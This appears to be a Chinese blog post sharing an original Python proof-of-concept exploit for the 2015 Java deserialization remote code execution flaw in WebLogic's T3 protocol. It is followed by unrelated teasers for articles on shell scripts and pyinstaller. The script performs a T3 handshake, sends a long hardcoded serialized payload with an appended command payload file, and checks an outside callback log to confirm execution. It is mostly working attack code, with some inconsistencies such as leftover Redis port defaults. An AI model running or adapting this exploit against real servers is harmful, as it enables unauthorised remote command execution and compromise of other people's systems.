反序列py脚本分享(原创)

代码如下:

 1 #!/usr/bin/env python
 2 # coding=utf-8
 3
 4 import socket
 5 import sys
 6 import requests
 7 import base64
 8 import string
 9 import urlparse
10 import os
11 import time
12 import requests
13
14
15 from baseframe import BaseFrame
16
17 class MyPoc(BaseFrame):
18     poc_info = {
19         # poc相关信息
20         ‘poc‘: {
21             ‘id‘: ‘poc-2015-1113‘,
22             ‘name‘: ‘java反序列漏洞weblogic‘,
23             ‘author‘: ‘vicky‘,
24             ‘create_date‘: ‘2015-11-13‘,
25         },
26         # 协议相关信息
27         ‘protocol‘: {
28             ‘name‘: ‘*‘,
29             ‘port‘: [‘*‘],
30             ‘layer4_protocol‘: [‘tcp‘],
31         },
32         # 漏洞相关信息
33         ‘vul‘: {
34             ‘app_name‘: ‘java‘,
35             ‘vul_version‘: [‘*‘],
36             ‘type‘: ‘远程命令执行‘,
37             ‘tag‘: [‘Java反序列漏洞‘, ‘远程命令执行‘, ‘weblogic‘],
38             ‘desc‘: ‘‘‘
39                     java 反序列漏洞使远程执行任意对象,配合weblogic中的Java反序列可使存在jenkins的系统远程执行命令
40                     ‘‘‘,
41             ‘references‘: [‘http://blog.chaitin.com/2015-11-11_java_unserialize_rce/?from=timeline&isappinstalled=0#rdd‘,
42                            ],
43         },
44     }
45     def _init_user_parser(self):
46         self.user_parser.add_option(‘-p‘,‘--port‘,
47                                 action=‘store‘, dest=‘port‘, type=‘int‘, default=6379,
48                                 help=‘this poc need the port to connect redis‘
49                                 ‘the default port is 6379.‘)
50
51     @classmethod
52     def verify(cls, args):
53
54         ip=args[‘options‘][‘target‘]
55         port=args[‘options‘][‘port‘]
56         socket.setdefaulttimeout(5)
57         payload=‘\x00\x00\x09\xfc\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00‘
58
59         try :
60             sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
61             server_address = (ip, int(port))
62             headers=‘t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n‘
63             sock.connect(server_address)
64             sock.sendall(headers)
65             data = sock.recv(1024)
66         except Exception,e:
67             return args
68         if "HELO" in data:
69             try:
70                 payloadObj = open(“serial.wget”).read()
71                 payload=payload+payloadObj
72                 payload=payload+‘\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x21\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x65\x65\x72\x49\x6e\x66\x6f\x58\x54\x74\xf3\x9b\xc9\x08\xf1\x02\x00\x07\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x74\x00\x27\x5b\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\x3b\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x56\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x97\x22\x45\x51\x64\x52\x46\x3e\x02\x00\x03\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x71\x00\x7e\x00\x03\x4c\x00\x0e\x72\x65\x6c\x65\x61\x73\x65\x56\x65\x72\x73\x69\x6f\x6e\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x12\x76\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x41\x73\x42\x79\x74\x65\x73\x74\x00\x02\x5b\x42\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x05\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x77\x02\x00\x00\x78\xfe\x00\xff\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x46\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x0b\x75\x73\x2d\x6c\x2d\x62\x72\x65\x65\x6e\x73\xa5\x3c\xaf\xf1\x00\x00\x00\x07\x00\x00\x1b\x59\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x1d\x01\x81\x40\x12\x81\x34\xbf\x42\x76\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\xa5\x3c\xaf\xf1\x00\x00\x00\x00\x00\x78‘
73                 sock.send(payload)
74                 time.sleep(10)
75                 data=requests.get(‘http://IP:PORT/log.log‘)
76                 if data.content.count(str(ip)) > 0:
77
78                     args[‘success‘] = True
79                     args[‘poc_ret‘][‘ip‘] = ip
80                     args[‘poc_ret‘][‘port‘]= port
81             except Exception,e:
82                 return args
83         return args
84     exploit = verify
85 if __name__ == ‘__main__‘:
86     from pprint import pprint
87
88     mp = MyPoc()
89 pprint(mp.run())

感觉可以好好研究java反序列的成因233.

时间: 2024-07-30 13:36:02

反序列py脚本分享(原创)的相关文章

并发批量管理500台以上服务器脚本分享(shell版)

也许很多人认为shell不能并发任务,其实可通过其它一些方式来实现.下面的脚本是我批量快速管理500+服务器脚本,阅读该脚本前建议先看<自动执行远程主机命令expect脚本>.<自动远程拷贝expect脚本>和<getopt:命令行选项.参数处理> 用法: Usage: ./multi_main.sh [-h|--help] [-v|-V|--version] [-l|--iplist ... ] [-c|--config ... ] [-t|--sshtimeout

网友微笑分享原创Jquery实现瀑布流特效

首先非常感谢网友微笑的无私分享,此Jquery特效是一款非常流行和实用的瀑布流布局,核心代码只有几十行,是我见过代码量最少的瀑布流布局,非常适合网友们学习哦,希望大家好好看一下这个Jquery特效的原代码,里面的每个功能注释写得非常详细.. 主要包括了以下几个功能函数:1.瀑布流主函数2.获取高度最小的列的函数3.判断请求数据的开关的函数4.请求数据加载的样式的函数 瀑布流代码如下: JS与CSS代码 /** * 作者:微笑 * QQ:904835003 * 邮箱:[email protecte

pyinstaller对py脚本进行打包(生成windows可执行程序)

这个没有什么截图,主要步骤如下: a. 安装python-2.7-x64版本(我的系统是win7-x64) b. 下载PyInstaller-2.1 x64版本 c. 下载pywin32-x64版本 d.下载upx.exe (这个在pyinstall官网上面会有提示) e.使用pythone setup.py install 安装pyinstaller 一般我们是生成单文件的exe,方便可以在其他windows机器上可执行. 生成的命令是: python pyinstaller.py  -F  

使用pyinstaller 对py脚本进行打包(生成linux可执行文件)

需求1:打包成Linux上可执行程序 a. 先下载pyinstaller程序,我当前下载的是PyInstaller-2.1的版本 进行如下操作: [email protected]:~/PyInstaller-2.1$ sudo python2.7 setup.py install [email protected]:~/PyInstaller-2.1$ pwd /home/pythoner/PyInstaller-2.1 #生成一个单文件可执行的spec文件 [email protected]

如何使用 pyinstaller 对py脚本进行打包?

需求1:打包成Linux上可执行程序a. 先下载pyinstaller程序,我当前下载的是PyInstaller-2.1的版本 进行如下操作: [email protected]:~/PyInstaller-2.1$ sudo python2.7 setup.py install [email protected]:~/PyInstaller-2.1$ pwd /home/pythoner/PyInstaller-2.1 生成一个单文件可执行的spec文件 [email protected]:~

py脚本打包exe可执行文件

python3以上版本打包exe需要扩展软件:cx_freeze 下载地址:http://cx-freeze.sourceforge.net/ 1)安装后在\Python32\Scripts\cxfreeze.bat和\Python32\Scripts\cxfreeze-quickstart.bat文件中更改python实际路径,如: C:\Python32\python.exe C:\Python32\Scripts\cxfreeze %*改为D:\Python32\python.exe D:

Linux生产服务器Shell脚本分享

Linux生产服务器Shell脚本分享 2012-6-6 86市场网 linux 作为一名Linux/unix系统管理员,我经常遇到人问这个问题:shell能做什么?PHP这么强大,为什么不用PHP来完成工作呢?其实相对于PHP这些开发语言而言,shell主要用于数据库备份(SVN备份).计划任务(crontab).服务状态监控.FTP远程备份等.对于这些任务,shell的强大是大家都公认的,这也是每一个Linux/unix系统管理员的基本之一.现在在Windows 2008里也出现了Power

Nginx和PHP-FPM的启动、重启、停止脚本分享

这篇文章主要介绍了Nginx和PHP-FPM的启动.重启.停止脚本分享,脚本中包含start.stop.reload.restart等常用的管理方法,并可以加入系统服务然后使用servicem命令管理,需要的朋友可以参考下 服务器上的Nginx和PHP都是源码编译安装的,不像ubuntu一样有自带service启动脚本,所以不支持类似以前的nginx (start|restart|stop|reload)了.自己动手丰衣足食.以下脚本应该在RHEL, Fedora, CentOS下都适用. 一.

(三)运行appium示例py脚本

运行appium官方自带示例py程序,需要进行下面两大步骤 =======第一步,获得待测示例APP与示例脚本============================= 下载以下库代码(appium 示例代码)至本地  某目录下 https://github.com/appium/sample-code 下载下来后,打开目录结构,包含apps与samples,这2大模块 其中apps中包含:示例待测APP: example中包含的是: 示例测试脚本,支持各种语言: example中包含多种语言编